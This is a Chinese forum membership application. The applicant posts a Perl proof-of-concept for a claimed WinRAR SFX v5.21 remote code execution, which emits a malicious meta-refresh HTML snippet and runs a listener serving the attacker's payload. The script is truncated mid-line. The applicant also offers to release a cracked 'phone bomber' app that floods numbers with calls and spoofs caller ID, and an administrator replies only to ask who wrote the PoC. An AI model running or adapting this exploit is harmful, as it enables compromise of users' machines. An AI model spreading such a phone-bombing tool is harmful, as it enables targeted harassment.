申请ID：i安卓

申 请 I D ：i安卓                     
个人邮箱：1669165062@qq.com


漏洞发现：WinRAR SFX v5.21 远程可执行代码附poc


测试代码
<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=http://www.baidu.com”></head></html>


附上 POC
PoC: Exploit Code
#!/usr/bin/perl
# Title : WinRaR SFX – Remote Code Execution
# Tested on Windows 7 / Server 2008 / Server 2003
#
# lr3800.com
use strict;
use warnings;
use IO::Socket;
use MIME::Base64 qw( decode_base64 );
use Socket ‘inet_ntoa’;
use Sys::Hostname ‘hostname’;
print ” Mohammad Reza Espargham\n\n”;
my $ip = inet_ntoa(scalar gethostbyname(hostname() || ‘localhost’));
my $port = 80;
print “Winrar HTML Code\n”.'<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=http://&apos; . $ip .
‘”></head></html>’.”\n\n” if($port==80);
print “Winrar HTML Code\n”.'<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=http://&apos; . $ip .
‘:’ . $port . ‘”></head></html>’.”\n\n” if($port!=80);
my $server = new IO::Socket::INET( Proto => ‘tcp’,
LocalPort => $port,
Listen => SOMAXCONN,
ReuseAddr => 1)
or die “Unable to create server socket”;
# Server loop
while(my $client = $server->accept())
{
my $client_info;
while(<$client>)
{
last if /^\r\n$/;
$client_info .= $_;
}
incoming($client, $client_info);
}
sub incoming
{
print “\n=== Incoming Request:\n”;
my $client = shift;
print $c

————————————————————————————————————

咨询问题：我在某技术论坛有精华帖，和自己发布的原创工具和教程
我主要擅长一点编程，安卓破解......
这样能申请吗，如果符合申请条件，我会继续申请
如果能给个邀请码，我会在论坛发布一个  收费版电话轰炸机破解版功能破黑名单，一直呼，响一声就挂，拨打号码自定义等牛逼的功能，自己破解无限制。
此电话轰炸机是手机版，轰炸更加方便，还有个牛逼的功能，轰炸手机号的人手机上显示手机号可以自定义，并不是未知号码，轰炸更加隐蔽
此电话轰炸机为自己私藏，百度搜不到。功能秒杀网上一切轰炸机。有人花300块向我买，我没卖
如果给个邀请码，我就当礼物发给大家，说到做到

Hmily

你那么牛逼的轰炸机没兴趣，倒是我想问一下，这个rar的poc是你分析出来的？